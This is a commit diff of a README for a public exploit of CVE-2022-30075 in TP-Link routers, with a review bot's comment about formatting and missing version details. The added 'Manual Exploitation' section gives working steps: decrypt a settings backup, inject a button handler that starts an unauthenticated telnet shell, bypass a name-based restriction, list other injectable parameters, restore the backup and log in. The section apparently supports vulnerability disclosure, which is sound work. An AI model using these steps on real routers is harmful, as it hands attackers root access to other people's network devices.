Projects STRLCPY CVE-2022-30075 Commits 46f74dae
    README.md
    skipped 10 lines
    11 11  Using exploit for starting telnet daemon on the router
    12 12  ![tplink](https://user-images.githubusercontent.com/28111712/172499966-8a5d486f-c79d-4fe2-95ff-de77d211ab54.png)
    13 13   
     14 +### Manual Exploitation
     15 +1. login to router web interface
     16 +2. go to advanced -> system -> backup settings
     17 +3. decrypt and decompress backup file
     18 +- if your router uses different format of backup files you can modify exploit code (class BackupParser) or simply use some tool from github:
     19 +https://github.com/stdnoerr/tp_link_credentials_harvester/blob/master/decrypt.py
     20 +https://github.com/ret5et/tplink_backup_decrypt_2022.bin
     21 +...
     22 +4. in decrypted xml file you can find something like this:
     23 +```xml
     24 +<button name="led_switch">
     25 + <action>pressed</action>
     26 + <button>ledswitch</button>
     27 + <handler>/lib/led_switch</handler>
     28 +</button>
     29 +```
     30 +- replace it with these lines
     31 +```xml
     32 +<button name="exploit">
     33 + <action>pressed</action>
     34 + <button>ledswitch</button>
     35 + <handler>/usr/sbin/telnetd -l /bin/login.sh</handler>
     36 +</button>
     37 +```
     38 +- there is a restriction that blocks modification of parameter `system.button.handler`, but it can be easily bypassed by changing name of parent xml node (e.g. `name="exploit"`)
     39 +- code execution can be achieved not only by changing parameter `system.button.handler`, but also using `ddns.service.ip_script`, `firewall.include.path`, `uhttpd.main`, and others...
     40 +5. compress and encrypt modified backup file
     41 +6. go to advanced -> system -> restore settings -> upload modified backup file
     42 +7. after reboot, push the led button that triggers execution of injected command `/usr/sbin/telnetd -l /bin/login.sh`
     43 +8. remotelly login to router: `telnet 192.168.1.1`
     44 + 
    14 45  ### Timeline
    15 46  15.03.2022 - Identified vulnerability
    16 47  15.03.2022 - Contacted Tp-Link support
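Review bot: The new "Manual Exploitation" section mixes numbered steps with unindented `-` sub-bullets, so the decryption note under step 3 and the note under step 4 read as free-standing items rather than as belonging to their steps; indent those `-` lines under the step they qualify, turn the two tool URLs into a proper list, and either drop the bare `...` line or replace it with a sentence. Step 8 has a typo: `remotelly` should be `remotely`. The bullet stating that the `system.button.handler` restriction is bypassed by renaming the parent node, together with the list of other parameters (`ddns.service.ip_script`, `firewall.include.path`, `uhttpd.main`) that give the same result, is the part a defender most needs; since the Timeline below records that TP-Link support was contacted but the README never says which firmware versions are affected or fixed, consider adding an "Affected / fixed versions" line next to the Timeline so readers can tell whether their device still accepts such a backup.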
    skipped 5 lines